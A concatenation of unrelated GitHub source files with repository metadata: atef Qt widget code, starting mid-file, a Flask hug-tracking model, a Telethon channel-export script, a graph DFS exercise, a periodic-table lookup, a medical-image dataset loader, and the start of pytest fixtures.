self.enum_input.activated.connect(self.update_from_enum)\n self.epics_input.textEdited.connect(self.update_from_epics)\n self.epics_refresh.clicked.connect(self.update_epics_preview)\n self.setup_refresh_icon(self.epics_refresh)\n self.happi_select_component.clicked.connect(self.select_happi_cpt)\n self.happi_refresh.clicked.connect(self.update_happi_preview)\n self.setup_refresh_icon(self.happi_refresh)\n self.float_input.valueChanged.connect(self.update_from_float)\n self.int_input.valueChanged.connect(self.update_normal)\n 
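# int and str inputs share the update_normal slot: per its docstring, these values need no preprocessing before being written back through the bridge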
self.str_input.textEdited.connect(self.update_normal)\n\n # Data Validators\n self.epics_input.setValidator(PV_validator)\n\n for widget in self.children():\n if hasattr(widget, \"font\"):\n set_widget_font_size(widget, self.font_pt_size)\n\n # Hide bool/str if \"Number\" annotation.\n for field in fields(self.bridge.data):\n if field.name == self.value_name:\n if field.type in (\n Number,\n \"Number\",\n Optional[Number],\n \"Optional[Number]\",\n ):\n self._is_number = True\n break\n\n # Select mode\n menu = QMenu()\n if not self._is_number:\n use_bool = menu.addAction(\"&Bool\")\n bool_slot = WeakPartialMethodSlot(use_bool, use_bool.triggered,\n self.set_mode, EditMode.BOOL)\n self._partial_slots.append(bool_slot)\n use_enum = menu.addAction(\"&Enum\")\n enum_slot = WeakPartialMethodSlot(use_enum, use_enum.triggered,\n self.set_mode, EditMode.ENUM)\n self._partial_slots.append(enum_slot)\n use_float = menu.addAction(\"&Float\")\n float_slot = WeakPartialMethodSlot(use_float, use_float.triggered,\n self.set_mode, EditMode.FLOAT)\n self._partial_slots.append(float_slot)\n use_int = menu.addAction(\"&Int\")\n int_slot = WeakPartialMethodSlot(use_int, use_int.triggered,\n self.set_mode, EditMode.INT)\n self._partial_slots.append(int_slot)\n if not self._is_number:\n use_str = menu.addAction(\"&String\")\n str_slot = WeakPartialMethodSlot(use_str, use_str.triggered,\n self.set_mode, EditMode.STR)\n self._partial_slots.append(str_slot)\n use_epics = menu.addAction(\"EPI&CS\")\n epics_slot = WeakPartialMethodSlot(use_epics, use_epics.triggered,\n self.set_mode, EditMode.EPICS)\n self._partial_slots.append(epics_slot)\n use_happi = menu.addAction(\"&Happi\")\n happi_slot = WeakPartialMethodSlot(use_happi, use_happi.triggered,\n self.set_mode, EditMode.HAPPI)\n self._partial_slots.append(happi_slot)\n self.select_mode_button.setMenu(menu)\n self.select_mode_button.setPopupMode(\n self.select_mode_button.InstantPopup\n )\n\n def setup_refresh_icon(self, button: QToolButton):\n \"\"\"\n Assign the refresh icon to a QToolButton.\n \"\"\"\n icon = self.style().standardIcon(QStyle.SP_BrowserReload)\n button.setIcon(icon)\n\n def update_from_bool(self, index: int) -> None:\n \"\"\"\n When the bool widget is updated by the user, save a boolean.\n \"\"\"\n self.value.put(bool(index))\n\n def update_from_enum(self, index: int) -> None:\n \"\"\"\n When the enum widget is updated by the user, save a string.\n \"\"\"\n text = self.enum_input.itemText(index)\n self.value.put(text)\n\n def update_from_float(self, value: float) -> None:\n \"\"\"\n When the float widget is updated by the user, save a float.\n \"\"\"\n self.value.put(float(value))\n\n def update_normal(self, value: Any) -> None:\n \"\"\"\n Catch-all for updates that are already correct.\n These are cases where no preprocessing of value is needed.\n \"\"\"\n match_line_edit_text_width(self.str_input, text=str(value),\n minimum=50, buffer=10)\n self.value.put(value)\n\n def update_from_epics(self, text: str) -> None:\n \"\"\"\n When the EPICS widget is updated by the user, save the PV name.\n \"\"\"\n match_line_edit_text_width(self.epics_input, text=text, minimum=50, buffer=10)\n self.epics_input.setToolTip(text)\n self.dynamic_bridge.pvname.put(text.strip())\n\n def update_epics_preview(self) -> None:\n \"\"\"\n When the user asks for a new value, get a value from EPICS.\n \"\"\"\n # Prepare each time to get updated value\n def _prepare_value():\n value = self.dynamic_value.get()\n asyncio.run(value.prepare(DataCache()))\n 
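# prepare() resolves the dynamic value against the live PV so that the value.get() calls below return the freshly fetched reading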
self.epics_value_preview.setText(str(value.get()))\n if isinstance(value.get(), (float, int)):\n self._show_tol = True\n else:\n self._show_tol = False\n self.show_tolerance.emit(self._show_tol)\n self.refreshed.emit()\n\n def _handle_errors(ex: Exception):\n if isinstance(ex, DynamicValueError):\n QtWidgets.QMessageBox.warning(\n self,\n 'Failed to connect to PV',\n 'Unable to gather PV information for preview. '\n 'PV may not exist or be inaccessible',\n )\n else:\n raise ex\n\n if self._prep_dynamic_thread:\n if self._prep_dynamic_thread.isRunning():\n # TODO: Consider threadpools for this and other threading apps?\n for i in range(10):\n QTimer.singleShot(1, self.update_epics_preview)\n\n self._prep_dynamic_thread = ThreadWorker(_prepare_value)\n self._prep_dynamic_thread.error_raised.connect(_handle_errors)\n self._prep_dynamic_thread.start()\n\n def select_happi_cpt(self) -> None:\n \"\"\"\n When the user clicks on the happi device name, open the cpt chooser.\n Unlike other uses of this GUI, this one is used to select both the\n device and component all at once, since we can only have one\n target for the dynamic value.\n \"\"\"\n if self.happi_select_widget is None:\n widget = HappiDeviceComponentWidget(\n client=util.get_happi_client()\n )\n widget.item_search_widget.happi_items_selected.connect(\n self.new_happi_devices\n )\n widget.device_widget.attributes_selected.connect(\n self.new_happi_attrs\n )\n self.happi_select_widget = widget\n self.happi_select_widget.show()\n self.happi_select_widget.activateWindow()\n\n try:\n current_device = self.dynamic_value.get().device_name\n except AttributeError:\n return\n if current_device:\n self.happi_select_widget.item_search_widget.edit_filter.setText(\n current_device\n )\n\n def new_happi_devices(self, device_names: List[str]) -> None:\n \"\"\"\n Cache the name of the last device that was selected.\n The selection widget gives us a list, but we can only accept\n one item, so the first element is selected.\n \"\"\"\n if device_names:\n self._last_device_name = device_names[0]\n\n def new_happi_attrs(self, attr_names: List[OphydAttributeData]) -> None:\n \"\"\"\n Set the new happi device/attr on the dataclass and on the display.\n This takes the selection we just chose in the UI and also the\n cached device name.\n The selection widget gives us a list, but we can only accept\n one item, so the first element is selected.\n \"\"\"\n if attr_names:\n self.dynamic_bridge.device_name.put(self._last_device_name)\n self.dynamic_bridge.signal_attr.put(attr_names[0].attr)\n self.update_happi_text()\n\n def update_happi_text(self) -> None:\n \"\"\"\n Update the text on the happi selection button as appropriate.\n \"\"\"\n happi_value = self.dynamic_value.get()\n if happi_value is not None:\n if not happi_value.device_name or not happi_value.signal_attr:\n text = \"click to select\"\n else:\n text = f\"{happi_value.device_name}.{happi_value.signal_attr}\"\n self.happi_select_component.setText(text)\n self.happi_select_component.setToolTip(text)\n\n def update_happi_preview(self) -> None:\n \"\"\"\n When the user asks for a new value, query happi and make a device.\n \"\"\"\n def _prepare_value():\n value = self.dynamic_value.get()\n asyncio.run(value.prepare(DataCache()))\n self.happi_value_preview.setText(str(value.get()))\n if isinstance(value.get(), (float, int)):\n self._show_tol = True\n else:\n self._show_tol = False\n\n self.show_tolerance.emit(self._show_tol)\n self.refreshed.emit()\n\n def _handle_errors(ex: Exception):\n if 
isinstance(ex, DynamicValueError):\n QtWidgets.QMessageBox.warning(\n self,\n 'Failed to connect to device',\n 'Unable to gather information from happi device for preview. '\n 'Device might be unset or failed to connect',\n )\n else:\n raise ex\n\n if self._prep_dynamic_thread:\n if self._prep_dynamic_thread.isRunning():\n # TODO: Consider threadpools for this and other threading apps?\n for i in range(10):\n QTimer.singleShot(1, self.update_happi_preview)\n\n self._prep_dynamic_thread = ThreadWorker(_prepare_value)\n self._prep_dynamic_thread.error_raised.connect(_handle_errors)\n self._prep_dynamic_thread.start()\n\n def set_mode_from_data(self) -> None:\n \"\"\"\n Set the expected mode from the current data.\n \"\"\"\n mode = None\n dynamic = self.dynamic_value.get() # get from QDataclassBridge\n if dynamic is not None:\n if isinstance(dynamic, EpicsValue):\n mode = EditMode.EPICS\n elif isinstance(dynamic, HappiValue):\n mode = EditMode.HAPPI\n else:\n raise TypeError(\n f\"Unexpected dynamic value {dynamic}.\"\n )\n\n # prepare dynamic value\n def prep_dynamic_value() -> Any:\n try:\n asyncio.run(dynamic.prepare(DataCache()))\n except DynamicValueError as ex:\n logger.warning('Unable to prepare dynamic value during '\n f'input widget initialization: {ex}')\n self.set_mode(EditMode.STR)\n return\n self.set_mode(mode)\n\n self.prep_dynamic_thread = ThreadWorker(prep_dynamic_value)\n self.prep_dynamic_thread.start()\n else:\n static = self.value.get()\n if isinstance(static, bool):\n mode = EditMode.BOOL\n elif isinstance(static, float):\n mode = EditMode.FLOAT\n elif isinstance(static, int):\n mode = EditMode.INT\n elif isinstance(static, str):\n self.setup_enums(set_mode=True)\n return\n elif static is None:\n if self._is_number:\n mode = EditMode.INT\n else:\n mode = EditMode.STR\n else:\n raise TypeError(\n f\"Unexpected static value {static}\"\n )\n\n self.set_mode(mode)\n\n def setup_enums(self, set_mode: bool = False) -> None:\n \"\"\"\n Get enum strings and populate enum combo\n if enums are found, sets the mode to enum\n \"\"\"\n self.enum_input.clear()\n\n self.ids = self.id_fn()\n if self.ids is None:\n # no identifiers... 
nothing to do, but this shouldn't happen\n return\n if self.devices is None:\n # Collect signals from ids as pv names\n # self.ids: List[str]\n signal_cache = get_signal_cache()\n sigs: List[EpicsSignalRO] = []\n for id in self.ids:\n sigs.append(signal_cache[id])\n\n else:\n # Collect signals from ids as device attrs\n # self.ids: List[Tuple[str, str]] (device, attr)\n device_names = self.devices\n devices = []\n for device_name in device_names:\n try:\n devices.append(util.get_happi_device_by_name(device_name))\n except MissingHappiDeviceError as ex:\n logger.debug(f'Device missing in enum value setup: {ex}')\n continue\n sigs: List[EpicsSignal] = []\n for dev, attr in self.ids:\n for device in devices:\n try:\n sig = getattr(device, attr)\n except AttributeError:\n continue\n else:\n sigs.append(sig)\n\n enums_in_order = []\n\n def get_signal_enums():\n start = time.monotonic()\n for sig in sigs:\n try:\n sig.wait_for_connection(timeout=1)\n except TimeoutError:\n pass\n if time.monotonic() - start >= 1:\n break\n\n enum_set = set()\n for sig in sigs:\n if sig.enum_strs is not None:\n for enum_str in sig.enum_strs:\n if enum_str not in enum_set:\n enum_set.add(enum_str)\n enums_in_order.append(enum_str)\n\n def fill_enums():\n for text in enums_in_order:\n self.enum_input.addItem(text)\n value = str(self.value.get())\n if value in enums_in_order:\n self.enum_input.setCurrentText(value)\n\n if set_mode:\n if enums_in_order:\n self.set_mode(EditMode.ENUM)\n else:\n self.set_mode(EditMode.STR)\n\n self.thread_worker = BusyCursorThread(func=get_signal_enums)\n self.thread_worker.task_finished.connect(fill_enums)\n self.thread_worker.start()\n\n def set_mode(self, mode: EditMode, *args, **kwargs) -> None:\n \"\"\"\n Change the mode of the edit widget.\n This adjusts the dynamic data classes as needed and\n shows only the correct edit widget.\n \"\"\"\n # Hide all the widgets\n self.epics_widget.hide()\n self.happi_widget.hide()\n self.bool_input.hide()\n self.enum_input.hide()\n self.float_input.hide()\n self.int_input.hide()\n self.str_input.hide()\n if mode == EditMode.EPICS:\n if not isinstance(self.dynamic_value.get(), EpicsValue):\n self.dynamic_value.put(EpicsValue(pvname=\"\"))\n self.dynamic_bridge = QDataclassBridge(self.dynamic_value.get())\n self.epics_input.setText(self.dynamic_bridge.pvname.get())\n self.epics_widget.show()\n elif mode == EditMode.HAPPI:\n if not isinstance(self.dynamic_value.get(), HappiValue):\n self.dynamic_value.put(\n HappiValue(device_name=\"\", signal_attr=\"\")\n )\n self.dynamic_bridge = QDataclassBridge(self.dynamic_value.get())\n self.update_happi_text()\n self.happi_widget.show()\n else:\n self.dynamic_value.put(None)\n self.dynamic_bridge = None\n if mode == EditMode.BOOL:\n self.bool_input.setCurrentIndex(int(bool(self.value.get())))\n self._show_tol = False\n self.bool_input.show()\n elif mode == EditMode.ENUM:\n self.setup_enums()\n self._show_tol = False\n self.enum_input.show()\n elif mode == EditMode.FLOAT:\n try:\n value = float(self.value.get())\n except (ValueError, TypeError):\n value = 0.0\n self._show_tol = True\n self.float_input.setValue(value)\n self.float_input.show()\n elif mode == EditMode.INT:\n try:\n value = int(self.value.get())\n except (ValueError, TypeError):\n value = 0\n self._show_tol = True\n self.int_input.setValue(value)\n self.int_input.show()\n elif mode == EditMode.STR:\n self._show_tol = False\n self.str_input.setText(str(self.value.get()))\n self.str_input.show()\n\n self.select_mode_button.setToolTip(\n 
f\"Current mode: {mode.name}\"\n )\n self.show_tolerance.emit(self._show_tol)\n\n\ndef disable_widget(widget: QWidget) -> QWidget:\n \"\"\" Disable widget, recurse through layouts \"\"\"\n # TODO: revisit, is there a better way to do this?\n for idx in range(widget.layout().count()):\n layout_item = widget.layout().itemAt(idx)\n if isinstance(layout_item, QLayout):\n disable_widget(layout_item)\n else:\n wid = layout_item.widget()\n if wid:\n wid.setEnabled(False)\n return widget\n\n\ndef gather_relevant_identifiers(\n comp: Comparison,\n group: Union[DeviceConfiguration, PVConfiguration, ToolConfiguration, SetValueStep]\n) -> list[str]:\n \"\"\"\n Gathers identifiers for ``comp`` from its parent ``group``. ``comp`` must\n be present in ``group``, else an empty list will be returned\n\n Identifiers are typically device+attribute pairs, or raw EPICS PVs\n\n This function will need to be updated when new configurations or steps are added\n\n Parameters\n ----------\n comp : Comparison\n the comparison in question\n group : Union[DeviceConfiguration, PVConfiguration]\n a configuration holding ``comp``\n\n Returns\n -------\n list[str]\n the identifiers related to ``comp``, or an empty list if none are found\n \"\"\"\n identifiers = []\n if isinstance(group, DeviceConfiguration):\n for device in group.devices:\n for attr, comparisons in group.by_attr.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append((device, attr))\n elif isinstance(group, PVConfiguration):\n for pvname, comparisons in group.by_pv.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append(pvname)\n elif isinstance(group, ToolConfiguration):\n for result_key, comparisons in group.by_attr.items():\n for comparison in comparisons + group.shared:\n if comparison == comp:\n identifiers.append(result_key)\n elif isinstance(group, SetValueStep):\n for check in group.success_criteria:\n if check.comparison == comp:\n signal = check.to_signal()\n if signal:\n identifiers.append(signal.pvname)\n\n return identifiers\n","repo_name":"pcdshub/atef","sub_path":"atef/widgets/config/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":73440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"2629000293","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport time\nfrom flask import url_for\nfrom flaskext.mail.message import Message\nfrom mongoengine import fields, Document\nfrom mongoengine.queryset import QuerySet\n\n\ndef get_week_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[1]\n\ndef get_year_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[0]\n\ndef get_day_number(when=None):\n if not when:\n when = datetime.date.today()\n return when.isocalendar()[2]\n\n\nclass UserQuerySet(QuerySet):\n def total_hugs(self):\n return self.sum('hugs_received')\n\n def average_hugs_given(self):\n return self.filter(hugs_given__gt=0).average('hugs_given')\n\n def average_hugs_received(self):\n return self.filter(hugs_received__gt=0).average('hugs_received')\n\n\nclass User(Document):\n name = fields.StringField(unique=True, unique_with='network')\n network = fields.StringField(default='github')\n access_token = fields.StringField(required=False)\n is_admin = fields.BooleanField(default=False)\n hugs_received = fields.IntField(default=0)\n hugs_given = fields.IntField(default=0)\n avatar_url = 
fields.StringField(required=False)\n notifications = fields.BooleanField(default=False)\n email = fields.EmailField(required=False)\n\n meta = {'queryset_class': UserQuerySet}\n\n def __unicode__(self):\n return self.name\n\n @property\n def url(self):\n return url_for('user', username=self.name, network=self.network)\n\n @property\n def network_url(self):\n return getattr(self, '%s_url' % self.network)\n\n @property\n def github_url(self):\n return 'https://github.com/%s' % self.name\n\n def can_hug(self):\n return self.get_today_hugged() is None\n\n def hug(self, receiver):\n hug = Hug.objects.create(hugger=self, hugged=receiver)\n self.hugs_given += 1\n self.save()\n receiver.hugs_received += 1\n receiver.save()\n return hug\n\n def get_today_hugged(self):\n try:\n return Hug.objects.get(hugger=self, week=get_week_number(), year=get_year_number(), day=get_day_number())\n except Hug.DoesNotExist:\n return None\n\n def get_this_week_hugged(self):\n try:\n return Hug.objects.get(hugger=self, week=get_week_number(), year=get_year_number())\n except Hug.DoesNotExist:\n return None\n\n def get_this_week_hugged_by(self):\n return Hug.objects.filter(hugged=self, week=get_week_number(), year=get_year_number())\n\n def get_unsubscribe_token(self):\n from app import signer\n return signer.dumps({'name': self.name, 'network': self.network, 'action': 'unsubscribe'})\n\n def to_dict(self, follow=False):\n data = {\n 'name': self.name,\n 'network': self.network,\n 'hugs_received': self.hugs_received,\n 'hugs_given': self.hugs_given,\n 'avatar_url': self.avatar_url,\n 'url': self.url,\n }\n if follow:\n data['hugs'] = [hug.to_dict(False) for hug in Hug.objects.filter(hugger=self).select_related()]\n return data\n\n\nclass HugQuerySet(QuerySet):\n def hugs_this_week(self):\n return self.filter(week=get_week_number(), year=get_year_number()).count()\n\n def hugs_last_week(self):\n last_week = datetime.date.today() - datetime.timedelta(days=7)\n return self.filter(week=get_week_number(last_week), year=get_year_number(last_week)).count()\n\n def get_recent(self, num):\n return self.order_by('-created').limit(num)\n\n\nclass Hug(Document):\n hugger = fields.ReferenceField(User, unique_with=['year', 'week', 'day'])\n hugged = fields.ReferenceField(User)\n created = fields.DateTimeField(default=datetime.datetime.now)\n week = fields.IntField(default=get_week_number)\n year = fields.IntField(default=get_year_number)\n day = fields.IntField(default=get_day_number)\n\n meta = {'queryset_class': HugQuerySet}\n\n def __unicode__(self):\n return u'%s -> %s' % (self.hugger, self.hugged)\n\n def notify_receiver(self):\n \"\"\"\n Notify the receiver\n \"\"\"\n from app import mail\n body = \"\"\"Hi %(hugged)s,\n\n You've just been hugged by %(hugger)s on https://www.githugs.org.\n\n Your GitHugs team.\n\n PS: If you don't want these notifications, click %(unsubscribe_url)s\"\"\" % {\n 'hugged': self.hugged,\n 'hugger': self.hugger,\n 'unsubscribe_url': 'https://www.githugs.org%s' % url_for('unsubscribe', token=self.hugged.get_unsubscribe_token())\n }\n message = Message(\n subject=\"You have been hugged\",\n sender=\"hugs@githugs.org\",\n recipients=[self.hugged.email],\n body=body,\n )\n mail.send(message)\n\n def to_dict(self, follow=False):\n data = {\n 'created': time.mktime(self.created.timetuple()),\n 'week': self.week,\n 'year': self.year,\n }\n if follow:\n data['hugger'] = self.hugger.to_dict()\n data['hugged'] = self.hugged.to_dict()\n else:\n data['hugger'] = self.hugger.name\n data['hugged'] = 
self.hugged.name\n        return data\n","repo_name":"ojii/githug","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"70928124979","text":"import os\r\nimport pandas as pd\r\nfrom telethon import TelegramClient\r\nfrom telethon.tl.functions.messages import SendMessageRequest\r\nfrom telethon.tl.functions.channels import GetParticipantsRequest\r\nfrom telethon.tl.types import ChannelParticipantsSearch\r\n\r\n#(https://my.telegram.org/auth?to=apps) register your number and get keys and hash\r\n#when the client starts it asks for a mobile number in the format +(country_code)(your mobile number). 
After that enter the otp code\r\napi_id = ''#put id and remove inverted commas\r\napi_hash = ''#put api hash in inverted commas\r\nclient = TelegramClient('sess_name', api_id, api_hash)\r\nclient.start()\r\n \r\ndef getChats(channel_name):\r\n\r\n schat=[]\r\n chat_hist = client.get_messages(str(channel_name),100)\r\n for i in range(len(chat_hist)):\r\n if chat_hist[i].to_dict()['_'] == 'Message':\r\n temp = chat_hist[i].to_dict()\r\n list1=[]\r\n list1.append(temp['date'])\r\n list1.append(temp['from_id'])\r\n list1.append(temp['id'])\r\n list1.append(temp['message'])\r\n list1.append(temp['reply_to_msg_id'])\r\n list1.append(temp['via_bot_id'])\r\n schat.append(list1)\r\n return schat\r\n \r\ndef getParticipants(channel_name):\r\n \r\n spart=[]\r\n total_participants = client.get_participants(str(channel_name),aggressive=True)\r\n for i in range(len(total_participants)):\r\n if total_participants[i].to_dict()['_'] == 'User':\r\n temp = total_participants[i].to_dict()\r\n tlist=[]\r\n tlist.append(temp['username'])\r\n tlist.append(temp['first_name'])\r\n tlist.append(temp['last_name'])\r\n spart.append(tlist)\r\n return spart\r\n \r\ndef getParticipantInfo(id):\r\n \r\n return client.get_entity(id).to_dict()\r\n \r\ndef sendMessage(name):\r\n \r\n client.send_message('Group_name',message='your_message')\r\n\r\nif __name__ == \"__main__\": \r\n #getting chats of that channel\r\n channel_name = str(input(\"Enter the channel name::::\"))\r\n chat = getChats(channel_name)\r\n #putting it in dataframe and get a csv file out of it\r\n col =['DateTime','From_Id(SendersId)','Message_id','Message','Reply_to_msg_id','Via_bot_id']\r\n chatDataFrame = pd.DataFrame(chat,columns=col)\r\n chatDataFrame.to_csv('Chats.csv',encoding='utf-8')\r\n \r\n #getting participants of that channel\r\n channel_name = str(input(\"Enter the channel name::::\"))\r\n part = getParticipants(channel_name)\r\n #putting it in dataframe and get a csv file out of it\r\n col1 =['Username','First_Name','Last_Name']\r\n partDataFrame = pd.DataFrame(part,columns=col1)\r\n partDataFrame.to_csv('Participants.csv',encoding='utf-8')\r\n \r\n #other functions can be called according to need(telegram_id is an integer)","repo_name":"jatin31/Telegram-Data-Fetch","sub_path":"FetchData.py","file_name":"FetchData.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7593406123","text":"# from collections import deque\r\n# import sys\r\n# input = input\r\n\r\n# n, m = map(int, input().split())\r\n# mylist = [list(map(int, input().split())) for _ in range(m)]\r\n\r\n# nodes = [[0] for _ in range(n+1)]\r\n# for i in range(m):\r\n# [a, b] = mylist[i]\r\n# nodes[a].append(b)\r\n# nodes[b].append(a)\r\n\r\n# visited = [False]*(n+1)\r\n# visited[0] = True\r\n\r\n# count = 0\r\n# for n in range(1, n+1):\r\n# if visited[n] == True:\r\n# continue\r\n\r\n# count += 1\r\n# q = deque([])\r\n# q.append(n)\r\n# visited[n] = True\r\n\r\n# while q:\r\n# s = q.popleft()\r\n# visited[s] = True\r\n\r\n# for i in nodes[s]:\r\n# if visited[i] == False:\r\n# q.append(i)\r\n# visited[i] = True\r\n\r\n# print(count)\r\n\r\n\r\n\r\n### dfs 솔루션\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10**9)\r\n\r\nn, m = map(int,input().split())\r\narr = [[0]*(n+1) for i in range(n+1)]\r\nvisited = [False]*(n+1)\r\n\r\nfor i in range(m):\r\n a, b = map(int, input().split())\r\n arr[a][b] = 1\r\n arr[b][a] = 1\r\ncount=0\r\n\r\ndef dfs(s):\r\n 
visited[s] = True\r\n    for i in range(1,n+1):\r\n        if visited[i]==False and arr[s][i] == 1:\r\n            dfs(i)\r\n\r\nfor i in range(1,n+1):\r\n    if visited[i] == False:\r\n        dfs(i)\r\n        count+=1\r\nprint(count)","repo_name":"sangwoo-sean/Baekjoon","sub_path":"11724(연결요소개수)(넓이우선탐색, 깊이우선탐색).py","file_name":"11724(연결요소개수)(넓이우선탐색, 깊이우선탐색).py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34603123149","text":"f = open('elements.txt','r')\r\na = [\"\"] * 118\r\nfor i in range(118): \r\n    a[i] = [\"\"] * 3 \r\nfor i in range(118):\r\n    s = f.readline().split(',')\r\n    s1 = s[2]\r\n    s2 = s1[0:-1]\r\n    a[i][0] += s[0]\r\n    a[i][1] += s[1]\r\n    a[i][2] += s2\r\n\r\nf.close()\r\nwhile s!=\"\":\r\n    s = input()\r\n    try:\r\n        \r\n        x = int(s)\r\n        \r\n        if x>0 and x<119:\r\n            x -=1\r\n            print( a[x][1], a[x][2], a[x][0])\r\n        else:\r\n            print(\"Haven't found that one yet :(\")\r\n    except ValueError:\r\n        for i in range (118):\r\n            if a[i][1]==s or a[i][2]==s:\r\n                print(a[i][0], a[i][1], a[i][2])\r\n                break \r\n        \r\n        print(\"Haven't found that one yet :(\")","repo_name":"Mr-Marlid/Python","sub_path":"Lab_12/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9193681744","text":"import argparse\nimport logging\n\nimport torchvision\n\nimport nibabel as nib\n\nimport fnmatch\nimport os\nimport random\nimport shutil\nimport string\nimport time\nfrom abc import abstractmethod\nfrom collections import defaultdict\nfrom time import sleep\nimport torch\nimport cv2\n\nimport numpy as np\nfrom torch.utils.data import DataLoader, Dataset\nimport transforms\n\n# Define transforms for BRAIN and ABDOMEN scans\nBRAIN_DEFAULT_TRANSFORM = torchvision.transforms.Compose(\n    [ \n        torchvision.transforms.ToPILImage(),\n        torchvision.transforms.Resize((128,128), interpolation=torchvision.transforms.InterpolationMode.BILINEAR),\n        torchvision.transforms.ToTensor(),\n        transforms.Scale(a=0, b=255, min_val=0, max_val=1), # Scale to [0, 255]\n        transforms.Dequantize(), # Add U(0, 1) noise, becomes [0, 256]\n        transforms.Scale(a=0, b=1, min_val=0, max_val=256), # Scale to [0, 1]\n    ]\n    )\n\nABDOM_DEFAULT_TRANSFORM = torchvision.transforms.Compose(\n    [ \n        torchvision.transforms.ToPILImage(),\n        torchvision.transforms.Resize((256,256), interpolation=torchvision.transforms.InterpolationMode.BILINEAR),\n        torchvision.transforms.ToTensor(),\n        transforms.Scale(a=0, b=255, min_val=0, max_val=1), # Scale to [0, 255]\n        transforms.Dequantize(), # Add U(0, 1) noise, becomes [0, 256]\n        transforms.Scale(a=0, b=1, min_val=0, max_val=256), # Scale to [0, 1]\n    ]\n    )\n\nclass MOOD2dDataSet(Dataset):\n    def __init__(\n        self,\n        root = \"\",\n        transform=None,\n    ):\n        super().__init__()\n\n        \"\"\"Dataset which loads 2D slices from a dir of NIFTI files.\n\n        Args:\n            base_dir ([str]): [Directory in which the nifti files are.]\n            transforms ([type], optional): [Transformation to do after loading the dataset -> pytorch data transforms]. 
Defaults to None\n \"\"\"\n \n self.root = root\n self.transform = transform\n\n self.items = self.load_dataset(self.root)\n self.data_len = len(self.items)\n\n def __len__(self):\n return self.data_len\n\n def __getitem__(self, idx):\n data_smpl, fn = self.get_data_by_idx(idx)\n\n data_smpl = data_smpl.transpose(1,2,0)\n\n data_smpl = [self.transform(data_smpl[i]) for i in range(data_smpl.shape[0])]\n data_smpl = [torch.cat([data_smpl[i]]*3, dim=0) for i in range(len(data_smpl))]\n data_smpl = torch.stack(data_smpl, dim=0)\n \n return data_smpl, fn\n\n def get_data_by_idx(self, idx):\n \"\"\"Returns a data sample for a given index i.e., file path -> 3-D Numpy array DxHxW\n\n Args:\n idx ([int]): [Index of the data sample]\n\n Returns:\n [np.ndarray]: [3-D Numpy array DxHxW]\n \"\"\"\n\n file = self.items[idx]\n nifti = nib.load(file)\n np_data = nifti.get_fdata()\n np_data = np_data.astype(np.float16)\n \n\n # slice to get 1 slice \n return np_data.astype(np.float32), file\n \n\n def load_dataset(self, base_dir):\n \"\"\"Indexes all files in the given directory and returns a list of 2-D slices (file_index, npy_file, slice_index_for_np_file)\n (so they can be loaded with get_data_by_idx)\n\n Args:\n base_dir ([str]): [Directory in which the npy files are.]\n Returns:\n [list]: [List of file paths which should be used in the dataset]\n \"\"\"\n files = []\n all_files = os.listdir(base_dir)\n \n for i, filename in enumerate(sorted(all_files)):\n if not filename.endswith(\"nii.gz\"):\n continue\n\n n_file = os.path.join(base_dir, filename)\n files.append(n_file)\n \n return files\n \n\n\n\n ","repo_name":"rkharkness/mood","sub_path":"scripts/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25957815406","text":"from pathlib import Path, PurePath\nfrom subprocess import run\nfrom typing import Any, List, Optional, Union\n\nimport pytest # type: ignore\n\nfrom parabot import parabot\n\n\n@pytest.fixture(\n scope=\"session\",\n params=[\n PurePath(\"examples/test_project_01/suite_01/suite.robot\"),\n PurePath(\"examples/test_project_02/suite_01\"),\n ],\n ids=[\"valid_path1\", \"valid_path2\"],\n)\ndef provide_valid_robot_filepath(request) -> Any:\n return request.param\n\n\n@pytest.fixture(\n scope=\"session\",\n params=[\n PurePath(\"examples/test_pro_01/suite_01/suite.robot\"),\n PurePath(\"examples/test_project_02/suite_0\"),\n ],\n ids=[\"invalid_path1\", \"invalid_path2\"],\n)\ndef provide_invalid_robot_filepath(request) -> Any:\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[\"reg\", \"smoke\"])\ndef provide_valid_tag(request) -> str:\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[\"regg\", \"smokes\"])\ndef provide_invalid_tag(request) -> str:\n return request.param\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_path_worker(provide_valid_robot_filepath) -> Optional[int]:\n result: Optional[int] = parabot.path_worker(provide_valid_robot_filepath)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_invalid_path_worker(provide_invalid_robot_filepath) -> Optional[int]:\n result: Optional[int] = parabot.path_worker(provide_invalid_robot_filepath)\n return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_tag_worker(provide_valid_tag) -> Optional[int]:\n result: Optional[int] = parabot.tag_worker(provide_valid_tag)\n return 
